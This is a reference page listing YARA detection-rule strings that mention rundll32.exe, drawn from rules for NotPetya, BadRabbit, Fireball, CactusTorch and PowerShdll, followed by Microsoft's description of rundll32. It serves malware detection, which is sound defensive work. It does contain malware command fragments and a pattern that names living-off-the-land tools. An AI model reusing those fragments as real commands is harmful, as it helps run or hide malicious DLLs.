| signature-base | cn_pentestset_webshells.yar | $s3 = “$cmd="cmd /c rundll32.exe $path,install $openPort $activeStr";” fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
| signature-base | crime_badrabbit.yar | $s9 = “process call create "C:\Windows\System32\rundll32.exe” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_fireball.yar | $s2 = “rundll32.exe "%s",%s” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_fireball.yar | $s2 = “RunDll32.exe "” fullword wide | CC BY-NC 4.0 |
| signature-base | crime_kriskynote.yar | $s1 = “rundll32 %s Check” fullword ascii | CC BY-NC 4.0 |
| signature-base | crime_nopetya_jun17.yar | $x2 = “process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 “ fullword wide | CC BY-NC 4.0 |
| signature-base | crime_nopetya_jun17.yar | $x3 = “-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 “ fullword wide | CC BY-NC 4.0 |
| signature-base | crime_nopetya_jun17.yar | /* ,#1 ….. rundll32.exe */ | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | description = “Detects uncommon file size of rundll32.exe” | CC BY-NC 4.0 |
| signature-base | generic_anomalies.yar | and filename == “rundll32.exe” | CC BY-NC 4.0 |
| signature-base | gen_gen_cactustorch.yar | $x6 = “Dim binary : binary = "rundll32.exe"” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_gen_cactustorch.yar | $s1 = “binary = "rundll32.exe"” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_gen_cactustorch.yar | $s4 = “var binary = "rundll32.exe";” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_malware_set_qa.yar | $s4 = “\sysnative\rundll32.exe” fullword ascii | CC BY-NC 4.0 |
| signature-base | gen_powershdll.yar | $x1 = “rundll32 PowerShdll,main -f |
CC BY-NC 4.0 |
| signature-base | gen_powershdll.yar | $x3 = “rundll32 PowerShdll,main | CC BY-NC 4.0 |
| signature-base | gen_rats_malwareconfig.yar | $s7 = “cmd.exe /c rundll32 "%s"” | CC BY-NC 4.0 |
| signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | description = “Tool used in Operation Cloud Hopper - pscp.exe cloaked as rundll32.exe” | CC BY-NC 4.0 |
| signature-base | yara_mixed_ext_vars.yar | all of them and filename == “rundll32.exe” | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
rundll32
Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.
You must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator.
Syntax
rundll32 <DLLname>
Parameters
| Parameter | Description |
|---|---|
| Rundll32 printui.dll,PrintUIEntry | Displays the printer user interface. |
Remarks
Rundll32 can only call functions from a DLL explicitly written to be called by Rundll32.
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.